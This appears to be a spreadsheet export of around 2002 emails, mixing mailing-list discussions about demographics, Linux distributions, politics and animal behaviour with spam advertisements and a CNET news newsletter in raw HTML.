 &gt; &gt;I'm seeing lack of innovation ..
 &gt; 
 &gt; That doesn't tell us anything except what is
 &gt; happening in Eugen Leitl's life. The more common
 Yeah, I happen to live in a small hole, under the roots of an old oak 
 tree. You don't, so innovation is a global phenomenon.
 &gt; observation is that the rate of change is increasing.
 &gt; Do you have any data that might persuade us that what
 &gt; you see is more telling than what others see?
 &gt; 
 &gt; &gt;gerontocracy favors gerontocracy.
 &gt; 
 &gt; I would have thought that gerontocracy favors biotech
 &gt; research and plenty of young workers to pay taxes.
 So thought I, but apparently all it favours is a lot of whining about good
 old times, the inability of youngn's to pay for your pension and the
 health insurance, and the generic influx of uncouth furriners, which must 
 be stopped, Somehow.
 &gt; Note that the fertility rate doesn't result from
 &gt; decisions made by the old, but by the young. If we
 Uh, I'm kinda aware of that.
 &gt; want more kids, we have to convince people who are
 &gt; in their twenties to become parents.
 Now we're talking. Got a plan?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Joke-Of -The- Day
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;center&gt;&lt;a href=http://www.vitafactory.com/&gt;&lt;img src=http://www.vitafactory.com/images/vitafactory-mail-logo.jpg border=0&gt;&lt;hr&gt;&lt;a href=http://www.vitafactory.com/ad-saturday/1.html&gt;&lt;img src=http://www.vitafactory.com/ad-saturday/1-adnew.gif border=0&gt;&lt;/a&gt;&lt;a href=http://www.vitafactory.com/ad-saturday/2.html&gt;&lt;img src=http://www.vitafactory.com/ad-saturday/2-adnew.gif border=0&gt;&lt;hr&gt;&lt;/a&gt; &lt;/b&gt;&lt;p align=left&gt;&lt;font color=#616161 face="Trebuchet MS" size=1&gt;&lt;br&gt;&lt;/font&gt;&lt;font color=#616161 face=Verdana size=2&gt;&lt;b&gt;Unsubscribe:&lt;/b&gt;&lt;br&gt;Please send a blank mail to:&lt;br&gt;unsub-56446664-12@fiona.free4all.com &lt;/font&gt;&lt;br&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Legal advice for only pennies
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#99FFCC"&gt;
 Fix your Bad Credit NOW! Simply &lt;a href="http://61.129.81.99/tbone2/legal.html?marketing_id=jb"&gt;Click Here&lt;/a&gt; and fill out the form. For only
 a few pennies a day, get access to our team of specialized attorneys to
 solve your problem now.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;a href="mailto:bluejo@btamail.net.cn"&gt;Click&lt;/a&gt; here and send an email to stop all future offers
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: US rejects Iraq inspections deal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8457381,215/
 Date: 2002-10-02T04:58:04+01:00
 The US has rejected an agreement between Iraq and the United Nations on arms 
 inspections, vowing to block the inspectors' return unless they are backed with 
 threats of military force.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt; Sorry, Shrub, your political newspeak is falling on deaf ears. Oh, 
 &gt; sorry, maybe I should self-censor my thoughts to avoid being put in a 
 &gt; 're-education camp' by Ashcrofts gestappo? Gads, maybe someone on FoRK 
 &gt; has joined your T.I.P.S. program and became an official citizen spy?
 &gt;
 &gt;
 &gt; In disgust,
 &gt; Elias
 Well the message was clear to me - the US wants to start an arms race to 
 jack up their world arms sales monopoly.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?iso-8859-1?B?SXQnc6BUaW1loHRvoEludmVzdKB5b3VyoFdheQ==?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_76F4_01C299FB.39D33820
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
  &lt;http://www.e-frsecurities.com/advise.asp&gt;=20
 Our company's investment objective is to achieve maximum capital
 appreciation and substantial dividend distributions through our
 successful operation and long-term quality service to our clients.=20
 Before any investment is made with us, we have to check on our client's
 suitability. Some investments are considered too high risk for low wage
 earners or individuals below a certain liquid net worth. Therefore we
 have developed our FRG Investment Locator. Apart from individual
 consultation, this will guide our investment experts in making a
 proficient individual investment plan. We are always open to our
 clients' suggestions on how to form their investment strategy. In
 special cases, clients specify what needs to be part of their portfolio.
 However, we are always here to ensure that the clients always get the
 best financial planning, based on their needs, goals, desires and risk
 tolerance.
 learn more . . . &lt;http://www.e-frsecurities.com/advise.asp&gt;=20
 Sincerely Yours,
 First Republic Securities=20
 You can visit us at http://www.e-frsecurities.com.
 If you wish to be removed from our mailing list, please click HERE
 &lt;http://www.e-frsecurities.com/remove.asp?n=3D71614&amp;e=3DJM@NETNOTEINC.COM=
 &amp;t=3D
 advise_AD&amp;f=3D=00&gt; .
 ------=_NextPart_000_76F4_01C299FB.39D33820
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt; &lt;head&gt; &lt;title&gt;Time is running out&lt;/title&gt; &lt;meta =
 http-equiv=3D'Content-Type' content=3D'text/html; charset=3Diso-8859-1'&gt; =
 &lt;/head&gt; &lt;body bgcolor=3D'#FFFFFF' text=3D'#000000'&gt; &lt;table width=3D'500' =
 border=3D'0' cellpadding=3D'3' cellspacing=3D'0'&gt; &lt;tr&gt; &lt;td&gt;&lt;div =
 align=3D'center'&gt;&lt;a =
 href=3D'http://www.e-frsecurities.com/advise.asp'&gt;&lt;img =
 src=3D'http://www.e-firstrepublic.com/Images/clock.gif' width=3D'500' =
 height=3D'150' border=3D'1'&gt;&lt;/a&gt;&lt;/div&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;p =
 align=3D'justify'&gt;&lt;font size=3D'2' face=3D'Verdana, Arial, Helvetica, =
 sans-serif'&gt;&lt;strong&gt;&lt;font size=3D'3'&gt;O&lt;/font&gt;&lt;/strong&gt;&lt;font =
 size=3D'1'&gt;ur company's investment objective is to achieve maximum =
 capital appreciation and substantial dividend distributions through our =
 successful operation and long-term quality service to our clients. =
 &lt;/font&gt;&lt;/font&gt;&lt;/p&gt; &lt;p align=3D'justify'&gt;&lt;font size=3D'1' =
 face=3D'Verdana, Arial, Helvetica, sans-serif'&gt;Before any investment is =
 made with us, we have to check on our client's suitability. Some =
 investments are considered too high risk for low wage earners or =
 individuals below a certain liquid net worth. Therefore we have =
 developed our &lt;strong&gt;FRG Investment Locator&lt;/strong&gt;. Apart from =
 individual consultation, this will guide our investment experts in =
 making a proficient individual investment plan. We are always open to =
 our clients' suggestions on how to form their investment strategy. In =
 special cases, clients specify what needs to be part of their portfolio. =
 However, we are always here to ensure that the clients always get the =
 best financial planning, based on their needs, goals, desires and risk =
 tolerance.&lt;/font&gt;&lt;/p&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td height=3D'57'&gt; &lt;div =
 align=3D'right'&gt;&lt;font size=3D'1' face=3D'Verdana, Arial, Helvetica, =
 sans-serif'&gt;&lt;a href=3D'http://www.e-frsecurities.com/advise.asp'&gt;learn =
 more . . .&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/body&gt; &lt;/html&gt; =
 &lt;br&gt;&lt;br&gt;Sincerely Yours,&lt;br&gt;&lt;br&gt;First Republic Securities =
 &lt;br&gt;&lt;br&gt;&lt;br&gt;You can visit us at &lt;a =
 href=3D'http://www.e-frsecurities.com'&gt;http://www.e-frsecurities.com&lt;/a&gt;.=
 &lt;br&gt;&lt;br&gt;If you wish to be removed from our mailing list, please click &lt;a =
 href=3D'http://www.e-frsecurities.com/remove.asp?n=3D71614&amp;e=3DJM@NETNOTE=
 INC.COM&amp;t=3Dadvise_AD&amp;f=3D '&gt;HERE&lt;/a&gt;.
 ------=_NextPart_000_76F4_01C299FB.39D33820--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] To hell with SuSE - is there a distro I can get (Was: SUSE 8 disks? (thread changed slightly))
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "John P. Looney" &lt;valen@tuatha.org&gt; a crit:
 &gt; &gt; I'm confused. I thought it was GPL'ed and
 &gt; &gt; that the money you paid SuSE was for your
 &gt; &gt; 60 day support or whatever? 
 &gt;  The RPMS are. The distribution as a whole work is
 &gt; copyright of SuSE.
 This IMHO, goes against the spirit of GPL. 
 Thanks for the info.
 Is there any distro (pref. Mandrake or failing
 that, Red Hat or other) out there for which people 
 have disks, are prepared to burn copies and are 
 allowed give to me for a small fee?
 TIA.
 Paul...
 &gt; Kate
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, well, uh, thank you, Russell.  LOL@#!  (I think?)
 C
 On Sat, 7 Sep 2002, Russell Turpin wrote:
 &gt; Robert Harley:
 &gt; &gt;It is perfectly obvious that (heterosexual) promiscuity is exactly, 
 &gt; &gt;precisely identical between males and females.
 &gt; 
 &gt; Yeah, assuming approximately equal populations.
 &gt; But that obscures the different modes of
 &gt; promiscuity. Both the person who gives sex for
 &gt; money or power or companionship and the person
 &gt; who uses money and power and companionship to
 &gt; get sex are promiscuous, in the broadest sense
 &gt; of the word. But their motives and behavior are
 &gt; quite different.
 &gt; 
 &gt; Langur monkeys were the example in the cited
 &gt; article. "Dominant males .. kill babies that
 &gt; are not their own." "The dominant male monkey
 &gt; .. seeks to defend his harem of females." But
 &gt; cozying up to the current dominant male isn't
 &gt; the best strategy for female langurs, because
 &gt; "dominant males are dethroned by rivals every
 &gt; 27 months or so." "By mating with as many
 &gt; extra-group males as possible, female langurs
 &gt; ensure their offspring against infanticide,"
 &gt; by the male who is likely next to rule the
 &gt; roost.
 &gt; 
 &gt; Maybe it's just me, but that doesn't paint a
 &gt; picture of carefree females engaged in joyously
 &gt; promiscuous couplings. The dom cab driver who
 &gt; is taking her two boy toys to New Orleans is a
 &gt; better picture of that. ;-)
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _________________________________________________________________
 &gt; Chat with friends online, try MSN Messenger: http://messenger.msn.com
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;The tech side of homeland defense&lt;/title&gt;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href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jEH6S-EYIEElDh4B1FR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqXHDksKFUByjw2PB1s79R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U7vHrWZW41PHq15ZNEEZuR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgFRL-ryUwcl8jfOfRHHUsR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFHEM3PdEfbQq-Kh1XhaZR"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10, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 The tech side of homeland defense&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Studios sue defunct $1 movie site&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 $215 million later, start-up Pluris shuts down&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple to expand iMac LCD display&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 NextCard cuts off credit card customers&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tapping China's brainpower&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fOmcJ6DmLwgkaZmRuR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;The tech side of homeland defense&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Computer security is becoming an increasingly critical part of President Bush's proposal for a Department of Homeland Security, as politicians fret about tech-savvy terrorists--and insist that any new agency must shield the United States from electronic attacks. Meanwhile, the administration says that it's open to the idea of a chief privacy officer for the agency.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 9:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnu8APVBwhq6GOxuYzsR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Studios sue defunct $1 movie site&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The movie studio's trade association filed suit Tuesday against Film88.com, a would-be Internet video Web site that has allegedly popped up in several incarnations around the world.
 Calling the site a "piratical, virtual 'video-on-demand' business," the Motion Picture Association of America (MPAA) and its member studios sued the company and an individual allegedly associated with it in a California federal court.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y56vxw1xmYgHobjqmZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;$215 million later, start-up Pluris shuts down&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Networking start-up Pluris will release a statement Wednesday announcing it has closed its doors due to a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
 Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:30 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd819BGQXK3_tvVyn4IcgdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Apple to expand iMac LCD display&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Apple Computer plans to serve up a new iMac model with a larger flat-panel display during next week's Macworld Expo trade show, according to sources.
 The upgrade to a 17-inch liquid crystal display (LCD) comes as sales have all but stalled on existing 15-inch flat-panel iMacs. Apple unveiled the original flat-panel iMac, which suspends the monitor from a pivoting arm attached to a hemispherical base, during January's Macworld Expo in San Francisco.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 3:50 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC_nvIVX4RVXFO5JSrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;NextCard cuts off credit card customers&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Federal regulators on Wednesday deactivated hundreds of thousands of credit cards belonging to former customers of NextCard.
 The Federal Deposit Insurance Corporation (FDIC), which had been trying unsuccessfully to sell the 800,000 accounts since taking them over in February, shut them down after they failed certain performance measures over the past three months, said David Barr, an FDIC spokesman. Although NextCard customers will no longer be able to use their cards to make purchase or cash withdrawals, they will continue to be responsible for their outstanding balances.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:25 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn06tVlLMrshsnStcVTQzciR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Tapping China's brainpower&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The country's engineers are ambitious--and finding open arms at U.S. companies.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtWIn_tyqT8UEE0WNrUZlR"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&lt;b&gt;The WorldCom hearing's target: voters&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 November-nervous lawmakers hogged the stage in a show of outrage and concern, while fact-finding barely made a cameo.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDLkOckUMBXB6W5WWcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Can Bush walk his talk?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 He said much that was right in his Wall Street speech. But doubts swirl about his follow-through--and his own business dealings.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGP2PgqHSCN0U7nQUDRR"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href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTP7isAE64qDAwrPGFR"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href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDmG6iLMKE-nFr99H29R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DTm_7zGZP85eXsJh-uR"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href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeDGOf-0pvVdi5Z7edsR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlrtn8Gg3F-erCpGY99R"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href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBorG2Rl28NRQSnqQuR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3YG9RDDFWVhZSgRXBsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jjlT3oOiJGu_NEsnEPR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblYC58a53xlZk0f-IonR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlkzdzqwuBXvl3NU2rR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnAspRkSjaeTldfVpfRR"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src="http://news.cnet.com/i/ne/bb/2002/07/0710_e911.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2p6Uz8s0dAVJ9PZAKTFR" &gt;Tech hurdles ahead for e911&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-Se-ffadxQMKtNX8PQ9R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-nM3JQzSROUJEymxquR"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href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDms3AvpmtTwxp6DtFR" &gt;
 India's Infosys tops forecast but is wary&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4KiNZqZn2fqfAgMcXea9R" &gt;
 Liberty Alliance to unveil software spec&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaM-BsfnODtxI8fiiuR" &gt;
 FBI picks new CIO&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wzvb-Hd5q0_HZB17WsR" &gt;
 Stocks slump on accounting jitters&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaB28WBP26D_8gaZjMZR" &gt;
 eBay glitch charges sellers double&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOxuv-EMLKlXBDgnVnR" &gt;
 Bush speech leaves Wall Street doubting&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMcws3SlpW-B_KMqztrR" &gt;
 WorldCom scrutiny goes federal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bidebRQA5K-fxuEL5iR" &gt;
 Comcast shareholders bless AT&amp;T deal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFgRjgUtuoAABMMPZ9FR" &gt;
 U.S. Attorney investigates Qwest&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabmTn7scCW5CH7esbKR9R" &gt;
 Banks bail out Vivendi with loans&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45sz-3ZQhaIHsSzky0uR" &gt;
 Bush security plan may get privacy nod&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-QCMEj6Z5znP-FdWuuFR" &gt;
 Gnutella pioneer Gene Kan dies&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvKVzg4mkSWreAgRDc9R" &gt;
 Verizon dials in for downtown details&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7YCsZ0lxv3orMjEsaQuR" &gt;
 Taiwan's Acer sees lax tech rebound&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YjVlL1_XGuwrfzJ6nsR" &gt;
 Chipmaker packs Wi-Fi into handhelds&lt;/a&gt;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href="http://clickthru.online.com/Click?q=17-agitI5Xrfbnz4KFIz4s1RhjGRsZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=2c-DahOzZ0WqUqt_bG-NlpIpzwPQcEhGRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGD-L1WU5CfCkxHB0FrR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9YCaBForctPQDwwaMCiR"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href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjWm38CNKQCL5-NPyEdnR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
